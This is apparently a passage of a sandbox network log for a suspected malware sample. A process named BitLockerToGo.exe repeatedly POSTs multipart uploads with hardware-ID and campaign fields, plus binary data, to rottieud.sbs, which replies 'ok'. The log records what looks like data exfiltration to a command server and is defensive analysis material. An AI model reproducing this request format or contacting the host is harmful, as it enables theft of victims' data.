2024-11-10 08:27:21 UTC	1369	IN	Data Raw: 74 32 35 75 6b 49 64 6e 73 4c 49 42 61 30 44 57 42 79 4d 49 32 6d 2f 6e 4e 66 5a 4c 63 47 4b 63 77 2b 65 6f 4d 66 32 34 35 59 43 6b 66 58 39 41 68 47 4d 68 70 42 43 6a 77 46 4e 47 4b 41 74 66 37 7a 53 7a 35 4d 34 69 49 42 35 54 38 48 6b 78 65 48 75 6c 41 69 56 74 61 46 48 47 4a 2f 48 77 67 53 68 43 31 63 64 6a 79 39 75 73 35 37 51 32 69 62 61 6c 58 41 4a 69 36 36 43 71 71 61 59 46 74 33 74 38 33 51 47 67 39 66 65 51 4a 55 46 56 52 57 49 4f 43 36 71 33 4d 6d 64 4a 73 54 48 4c 55 2b 53 70 4d 37 6a 37 70 6b 4b 6c 62 71 38 53 77 53 56 79 73 59 51 70 77 5a 53 46 59 41 69 5a 37 69 56 33 64 59 72 78 59 4e 79 44 74 6e 71 67 75 50 2b 33 31 62 64 67 36 4e 50 47 72 72 4e 78 41 76 67 47 52 55 43 7a 79 6c 69 39 63 71 51 32 53 33 41 6a 58 6f 47 6b 36 37 4e 37 65 61 58 Data Ascii: t25ukIdnsLIBa0DWByMI2m/nNfZLcGKcw+eoMf245YCkfX9AhGMhpBCjwFNGKAtf7zSz5M4iIB5T8HkxeHulAiVtaFHGJ/HwgShC1cdjy9us57Q2ibalXAJi66CqqaYFt3t83QGg9feQJUFVRWIOC6q3MmdJsTHLU+SpM7j7pkKlbq8SwSVysYQpwZSFYAiZ7iV3dYrxYNyDtnqguP+31bdg6NPGrrNxAvgGRUCzyli9cqQ2S3AjXoGk67N7eaX
2024-11-10 08:27:21 UTC	1369	IN	Data Raw: 4e 46 44 74 53 65 69 43 32 48 4d 78 6b 36 74 57 35 78 2b 34 75 51 32 69 32 49 33 7a 55 44 6d 71 6a 4b 36 2b 43 57 41 70 65 38 75 45 34 64 6b 4d 72 42 42 36 59 48 58 68 36 4f 4b 6d 4b 2f 6c 4e 50 65 4c 73 65 49 66 55 2f 58 35 4d 58 38 70 73 64 4f 75 4b 4b 34 54 42 44 55 32 59 59 62 34 41 46 58 57 39 64 75 59 72 79 55 31 74 67 74 79 59 46 39 43 70 47 67 77 2b 4c 67 6e 41 47 5a 73 4c 4a 4e 45 70 6a 49 77 67 4f 68 43 6c 41 55 68 43 73 75 2b 39 4c 58 78 57 47 51 78 30 51 4d 6a 37 50 53 36 4b 61 41 51 49 54 31 74 45 35 57 7a 49 62 4a 45 4b 6f 4d 56 52 36 41 4b 32 32 36 6c 64 33 62 4c 63 4b 4f 66 51 6d 57 72 64 44 6e 36 70 45 4a 6b 37 6d 39 54 78 79 58 79 34 68 4d 34 41 46 44 57 39 64 75 51 72 4b 66 2f 74 59 74 7a 38 64 71 51 59 44 6b 78 65 69 6d 78 30 36 52 76 Data Ascii: NFDtSeiC2HMxk6tW5x+4uQ2i2I3zUDmqjK6+CWApe8uE4dkMrBB6YHXh6OKmK/lNPeLseIfU/X5MX8psdOuKK4TBDU2YYb4AFXW9duYryU1tgtyYF9CpGgw+LgnAGZsLJNEpjIwgOhClAUhCsu+9LXxWGQx0QMj7PS6KaAQIT1tE5WzIbJEKoMVR6AK226ld3bLcKOfQmWrdDn6pEJk7m9TxyXy4hM4AFDW9duQrKf/tYtz8dqQYDkxeimx06Rv
2024-11-10 08:27:21 UTC	1369	IN	Data Raw: 45 78 59 6f 7a 74 67 56 4e 45 49 49 69 4c 71 72 63 79 5a 30 6d 78 4d 63 74 54 35 2b 72 79 2b 66 70 6e 67 65 52 75 4c 5a 4c 45 35 58 41 7a 41 69 71 42 6c 30 64 6a 69 74 6b 74 70 50 61 31 43 62 41 67 48 59 64 32 65 71 43 34 2f 37 66 56 74 32 63 74 46 41 59 68 49 62 58 54 4c 6c 47 58 42 66 50 64 69 36 78 6d 4e 2f 5a 4a 73 53 42 63 41 6d 55 70 63 33 6c 35 70 41 4b 6c 72 79 31 51 78 75 52 79 38 77 51 71 67 31 55 46 34 59 69 59 2f 58 63 6b 4e 6f 35 69 4e 38 31 50 70 53 71 7a 4f 50 77 33 78 48 54 72 50 4e 46 47 74 53 65 69 41 4f 73 43 56 67 55 6a 43 31 76 76 34 44 43 30 53 6a 41 67 6e 6b 45 6c 36 4c 51 34 75 6d 57 44 5a 36 38 74 45 6f 61 6e 73 58 50 51 75 35 47 58 41 50 50 64 69 36 57 68 63 44 51 59 64 66 4a 62 45 2b 65 71 49 4b 38 70 70 63 44 6c 62 2b 33 52 52 Data Ascii: ExYoztgVNEIIiLqrcyZ0mxMctT5+ry+fpngeRuLZLE5XAzAiqBl0djitktpPa1CbAgHYd2eqC4/7fVt2ctFAYhIbXTLlGXBfPdi6xmN/ZJsSBcAmUpc3l5pAKlry1QxuRy8wQqg1UF4YiY/XckNo5iN81PpSqzOPw3xHTrPNFGtSeiAOsCVgUjC1vv4DC0SjAgnkEl6LQ4umWDZ68tEoansXPQu5GXAPPdi6WhcDQYdfJbE+eqIK8ppcDlb+3RR
2024-11-10 08:27:21 UTC	1369	IN	Data Raw: 41 61 41 43 58 78 79 4b 4c 57 4b 2b 6c 64 50 53 4a 63 47 4a 66 41 44 5a 36 6f 4c 6a 2f 74 39 57 33 5a 53 6f 51 52 71 5a 68 74 64 4d 75 55 5a 63 46 38 39 32 4c 72 6d 63 31 64 30 72 7a 6f 4e 77 43 5a 4f 68 77 75 2f 6c 6b 41 71 62 73 62 78 43 48 5a 33 48 7a 67 65 71 44 56 30 57 6a 43 68 6f 39 64 79 51 32 6a 6d 49 33 7a 55 76 67 71 6e 4f 34 36 61 41 51 49 54 31 74 45 35 57 7a 49 62 44 44 71 51 42 57 78 61 4d 4a 6d 75 78 6d 4e 58 64 4b 64 71 50 64 51 69 4c 74 73 4c 74 34 35 4d 4e 6e 62 47 31 53 78 43 58 77 6f 68 4d 34 41 46 44 57 39 64 75 51 37 6d 56 2b 64 6f 36 69 4a 67 37 46 74 6d 6a 7a 71 53 2b 33 77 2b 57 76 37 78 50 46 5a 4c 46 77 77 65 71 42 31 77 54 67 6a 78 74 75 70 33 55 33 53 37 4f 67 58 51 41 6e 36 50 4c 35 65 36 59 54 74 50 31 74 46 70 57 7a 49 62 Data Ascii: AaACXxyKLWK+ldPSJcGJfADZ6oLj/t9W3ZSoQRqZhtdMuUZcF892Lrmc1d0rzoNwCZOhwu/lkAqbsbxCHZ3HzgeqDV0WjCho9dyQ2jmI3zUvgqnO46aAQIT1tE5WzIbDDqQBWxaMJmuxmNXdKdqPdQiLtsLt45MNnbG1SxCXwohM4AFDW9duQ7mV+do6iJg7FtmjzqS+3w+Wv7xPFZLFwweqB1wTgjxtup3U3S7OgXQAn6PL5e6YTtP1tFpWzIb
2024-11-10 08:27:21 UTC	339	IN	Data Raw: 52 74 56 7a 79 45 75 37 61 75 51 31 43 62 54 6c 6d 4d 43 69 61 4f 43 32 36 6a 66 46 74 33 74 38 33 63 56 6d 73 6a 50 46 4c 46 4c 66 41 32 46 4b 58 36 79 68 64 2b 64 62 34 69 42 4e 56 66 4b 36 6f 4c 67 39 39 39 57 7a 65 66 6f 46 30 58 44 6c 70 6f 64 37 68 38 62 44 63 39 32 50 50 76 53 77 70 31 35 69 4d 42 32 48 59 75 69 77 66 4c 6c 32 44 43 6a 6b 71 6c 50 45 49 50 58 39 6a 79 6e 48 46 59 64 6d 44 38 69 6f 4a 48 65 30 79 62 65 78 7a 74 50 6c 75 53 61 33 61 62 58 54 71 4c 37 38 31 70 57 7a 49 62 39 41 61 34 49 58 41 32 65 59 30 6d 76 6e 39 62 4b 4d 49 6a 4a 4e 51 6e 5a 2f 4a 4b 71 70 70 73 66 33 65 33 6a 45 45 33 42 6c 5a 39 53 38 68 6b 56 41 73 38 34 4c 75 33 41 6e 70 30 7a 69 4e 38 31 53 4a 71 32 30 4f 4c 6c 69 51 33 61 69 34 31 73 45 5a 4c 44 7a 78 4c 69 Data Ascii: RtVzyEu7auQ1CbTlmMCiaOC26jfFt3t83cVmsjPFLFLfA2FKX6yhd+db4iBNVfK6oLg999WzefoF0XDlpod7h8bDc92PPvSwp15iMB2HYuiwfLl2DCjkqlPEIPX9jynHFYdmD8ioJHe0ybexztPluSa3abXTqL781pWzIb9Aa4IXA2eY0mvn9bKMIjJNQnZ/JKqppsf3e3jEE3BlZ9S8hkVAs84Lu3Anp0ziN81SJq20OLliQ3ai41sEZLDzxLi
2024-11-10 08:27:21 UTC	1369	IN	Data Raw: 32 32 31 64 0d 0a 64 4d 75 55 5a 4e 57 39 64 38 49 50 57 41 6b 49 56 68 6a 34 52 6e 48 5a 2b 6e 31 4f 65 68 6f 54 43 65 6f 37 35 4e 48 5a 58 34 39 69 79 74 42 31 67 56 7a 52 39 34 75 49 4c 54 32 43 62 32 75 58 73 49 6a 61 50 4d 34 75 62 66 51 4e 32 36 38 78 6f 76 31 49 36 49 50 65 35 47 51 31 76 58 62 6c 75 32 6e 4e 37 61 4e 39 6e 4b 56 68 6d 55 71 38 6e 6c 70 74 46 4f 6d 2f 58 72 45 6c 6a 55 77 74 6c 43 2b 46 59 4a 51 4e 70 39 4f 65 58 41 7a 35 4d 34 69 4a 45 31 56 38 76 71 67 76 61 6d 78 30 37 61 75 37 35 44 46 5a 72 46 32 68 43 6d 42 55 30 59 79 42 42 51 6c 4a 2f 62 30 53 7a 48 6a 45 73 78 75 4b 6e 4a 36 4f 75 51 42 61 4f 4c 70 6b 45 59 6d 73 48 65 45 2b 42 49 47 78 54 50 64 6c 66 31 32 70 44 69 62 34 69 66 4e 56 66 5a 6b 63 48 71 36 4a 67 59 6a 50 69 Data Ascii: 221ddMuUZNW9d8IPWAkIVhj4RnHZ+n1OehoTCeo75NHZX49iytB1gVzR94uILT2Cb2uXsIjaPM4ubfQN268xov1I6IPe5GQ1vXblu2nN7aN9nKVhmUq8nlptFOm/XrEljUwtlC+FYJQNp9OeXAz5M4iJE1V8vqgvamx07au75DFZrF2hCmBU0YyBBQlJ/b0SzHjEsxuKnJ6OuQBaOLpkEYmsHeE+BIGxTPdlf12pDib4ifNVfZkcHq6JgYjPi
2024-11-10 08:27:21 UTC	1369	IN	Data Raw: 6f 61 51 51 75 63 46 53 51 6d 4a 4c 58 69 32 31 65 37 6a 42 4e 2b 45 5a 51 6d 61 6d 76 7a 50 36 70 6b 4a 68 37 4b 31 5a 44 62 55 69 49 67 4e 34 46 35 69 57 38 64 75 55 66 76 53 79 4a 31 35 69 4c 4a 32 41 5a 65 6a 31 50 57 72 75 68 6d 65 70 62 56 42 56 74 71 47 7a 6b 4c 34 56 68 56 62 69 7a 38 75 37 63 4b 43 68 6e 53 62 30 43 56 64 68 75 72 62 70 50 44 66 56 73 2f 37 38 31 42 57 7a 49 61 50 41 62 49 55 58 52 69 5a 4c 53 6d 4c 72 50 62 65 4d 4d 4b 6d 65 42 2b 65 6d 76 7a 78 35 5a 45 41 6d 71 4f 69 41 6c 6a 55 79 59 68 61 6d 55 59 54 56 34 6b 74 65 50 57 74 6e 70 30 35 69 4e 38 31 4f 70 71 71 7a 4f 50 77 6a 6b 4f 37 74 71 4a 49 4e 35 6e 57 7a 30 4c 75 52 6c 31 62 31 33 30 67 39 5a 62 42 6e 58 6d 59 31 53 35 61 79 76 4f 53 74 76 6e 52 46 39 32 6a 38 78 70 45 Data Ascii: oaQQucFSQmJLXi21e7jBN+EZQmamvzP6pkJh7K1ZDbUiIgN4F5iW8duUfvSyJ15iLJ2AZej1PWruhmepbVBVtqGzkL4VhVbiz8u7cKChnSb0CVdhurbpPDfVs/781BWzIaPAbIUXRiZLSmLrPbeMMKmeB+emvzx5ZEAmqOiAljUyYhamUYTV4ktePWtnp05iN81OpqqzOPwjkO7tqJIN5nWz0LuRl1b130g9ZbBnXmY1S5ayvOStvnRF92j8xpE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	62520	104.21.73.211	443	7812	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 08:27:22 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=7VW3YXLZA66F9E User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18139 Host: rottieud.sbs
2024-11-10 08:27:22 UTC	15331	OUT	Data Raw: 2d 2d 37 56 57 33 59 58 4c 5a 41 36 36 46 39 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 42 33 35 44 41 41 39 46 35 44 46 42 37 45 36 43 35 42 45 32 42 31 31 46 36 41 37 46 44 41 38 0d 0a 2d 2d 37 56 57 33 59 58 4c 5a 41 36 36 46 39 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 56 57 33 59 58 4c 5a 41 36 36 46 39 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 65 53 61 78 41 75 2d 2d 77 65 62 65 78 0d 0a 2d 2d 37 56 57 33 59 58 4c 5a Data Ascii: --7VW3YXLZA66F9EContent-Disposition: form-data; name="hwid"6B35DAA9F5DFB7E6C5BE2B11F6A7FDA8--7VW3YXLZA66F9EContent-Disposition: form-data; name="pid"2--7VW3YXLZA66F9EContent-Disposition: form-data; name="lid"eSaxAu--webex--7VW3YXLZ
2024-11-10 08:27:22 UTC	2808	OUT	Data Raw: 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16 4d 6d b7 df b2 9f ab 08 69 99 b1 aa c5 3d ae Data Ascii: ntFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3R?lMmi=
2024-11-10 08:27:23 UTC	1015	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 08:27:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=84i51dda407da5k9nnllhd1chs; expires=Thu, 06-Mar-2025 02:14:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9%2FkNV%2B9DHrIR7TAV%2FlTn1mA4b%2F5Bb8TNApSPydk4JtJrXIz8uAOXTXSxlD45wc2Qt%2BwiZqWyNwj6FyICdgJXyB8e6qIFicxApPVUP5i32Y5vSDSCNEl%2BHTlK6oCya8k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e04a9bc78ea6b31-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1184&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2826&recv_bytes=19093&delivery_rate=2350649&cwnd=247&unsent_bytes=0&cid=d62835fbc6cbc4ea&ts=666&x=0"
2024-11-10 08:27:23 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a Data Ascii: 11ok 173.254.250.72
2024-11-10 08:27:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	62521	104.21.73.211	443	7812	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 08:27:24 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=MZVX4FV38R3YLXIAE5Q User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8790 Host: rottieud.sbs
2024-11-10 08:27:24 UTC	8790	OUT	Data Raw: 2d 2d 4d 5a 56 58 34 46 56 33 38 52 33 59 4c 58 49 41 45 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 42 33 35 44 41 41 39 46 35 44 46 42 37 45 36 43 35 42 45 32 42 31 31 46 36 41 37 46 44 41 38 0d 0a 2d 2d 4d 5a 56 58 34 46 56 33 38 52 33 59 4c 58 49 41 45 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 5a 56 58 34 46 56 33 38 52 33 59 4c 58 49 41 45 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 65 53 61 78 41 75 2d 2d 77 65 Data Ascii: --MZVX4FV38R3YLXIAE5QContent-Disposition: form-data; name="hwid"6B35DAA9F5DFB7E6C5BE2B11F6A7FDA8--MZVX4FV38R3YLXIAE5QContent-Disposition: form-data; name="pid"2--MZVX4FV38R3YLXIAE5QContent-Disposition: form-data; name="lid"eSaxAu--we
2024-11-10 08:27:24 UTC	1007	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 08:27:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g9g752jdt9asfhr18gjmolvmn3; expires=Thu, 06-Mar-2025 02:14:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o5po%2FnSnrS%2FPodfOAqTkx3xRlhes7rqSyRfYGZ67fcwiGnexdCpu70gMuSBGEEcTZKzF5G9kNNcMfXQCtNVuSA%2F7OJGQcaytrQMTTzmJ2EEFAse2wAaslWSBvRJBBbo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e04a9c4cf1e6c81-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1038&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2827&recv_bytes=9726&delivery_rate=2683966&cwnd=251&unsent_bytes=0&cid=a6c2a422f6119a28&ts=530&x=0"
2024-11-10 08:27:24 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a Data Ascii: 11ok 173.254.250.72
2024-11-10 08:27:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	62522	104.21.73.211	443	7812	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 08:27:25 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=9XOYRA8F42FOFM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20413 Host: rottieud.sbs
2024-11-10 08:27:25 UTC	15331	OUT	Data Raw: 2d 2d 39 58 4f 59 52 41 38 46 34 32 46 4f 46 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 42 33 35 44 41 41 39 46 35 44 46 42 37 45 36 43 35 42 45 32 42 31 31 46 36 41 37 46 44 41 38 0d 0a 2d 2d 39 58 4f 59 52 41 38 46 34 32 46 4f 46 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 58 4f 59 52 41 38 46 34 32 46 4f 46 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 65 53 61 78 41 75 2d 2d 77 65 62 65 78 0d 0a 2d 2d 39 58 4f 59 52 41 38 46 Data Ascii: --9XOYRA8F42FOFMContent-Disposition: form-data; name="hwid"6B35DAA9F5DFB7E6C5BE2B11F6A7FDA8--9XOYRA8F42FOFMContent-Disposition: form-data; name="pid"3--9XOYRA8F42FOFMContent-Disposition: form-data; name="lid"eSaxAu--webex--9XOYRA8F
2024-11-10 08:27:25 UTC	5082	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2024-11-10 08:27:26 UTC	1013	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 08:27:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4p0si31jjmkdc2t74se6e86gbh; expires=Thu, 06-Mar-2025 02:14:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u9syz0amV%2Bk1xXEyG2xw%2B%2Fn%2BtH80jnvpEfzimWTRXOKS2nu8Hl2dAdEk99xtXEqZFe2sEVqiNqOsMgCBKnkS8HPooZVZMxUMRgvJRlf8GdccMXm0p%2FHGTSt6Oeyfne8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e04a9cd5c3d6bd4-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1134&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2828&recv_bytes=21367&delivery_rate=2311252&cwnd=251&unsent_bytes=0&cid=2bbc50e4d76ae6ac&ts=569&x=0"
2024-11-10 08:27:26 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a Data Ascii: 11ok 173.254.250.72
2024-11-10 08:27:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	62523	104.21.73.211	443	7812	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 08:27:27 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=OPDDOUELN5HDDDX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1236 Host: rottieud.sbs
2024-11-10 08:27:27 UTC	1236	OUT	Data Raw: 2d 2d 4f 50 44 44 4f 55 45 4c 4e 35 48 44 44 44 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 42 33 35 44 41 41 39 46 35 44 46 42 37 45 36 43 35 42 45 32 42 31 31 46 36 41 37 46 44 41 38 0d 0a 2d 2d 4f 50 44 44 4f 55 45 4c 4e 35 48 44 44 44 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 50 44 44 4f 55 45 4c 4e 35 48 44 44 44 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 65 53 61 78 41 75 2d 2d 77 65 62 65 78 0d 0a 2d 2d 4f 50 44 44 4f Data Ascii: --OPDDOUELN5HDDDXContent-Disposition: form-data; name="hwid"6B35DAA9F5DFB7E6C5BE2B11F6A7FDA8--OPDDOUELN5HDDDXContent-Disposition: form-data; name="pid"1--OPDDOUELN5HDDDXContent-Disposition: form-data; name="lid"eSaxAu--webex--OPDDO
2024-11-10 08:27:27 UTC	1006	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 08:27:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=it5lm0598o4699r5l538mdbjpa; expires=Thu, 06-Mar-2025 02:14:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lke4uNCHa0lXFoihIuA1blelnzeleUC1DUv6FMzqCLSCDZu0whHiQG66ybP5BcNGjO4ywPHztk4errWJo1XY1tGq4Hv0Prjfr%2FQNqBS6f8u0s7D%2BHaPzL%2Fca4aEidjQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e04a9d708906b04-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1087&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2146&delivery_rate=2618444&cwnd=233&unsent_bytes=0&cid=7226882c0414dfad&ts=740&x=0"
2024-11-10 08:27:27 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a Data Ascii: 11ok 173.254.250.72
2024-11-10 08:27:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
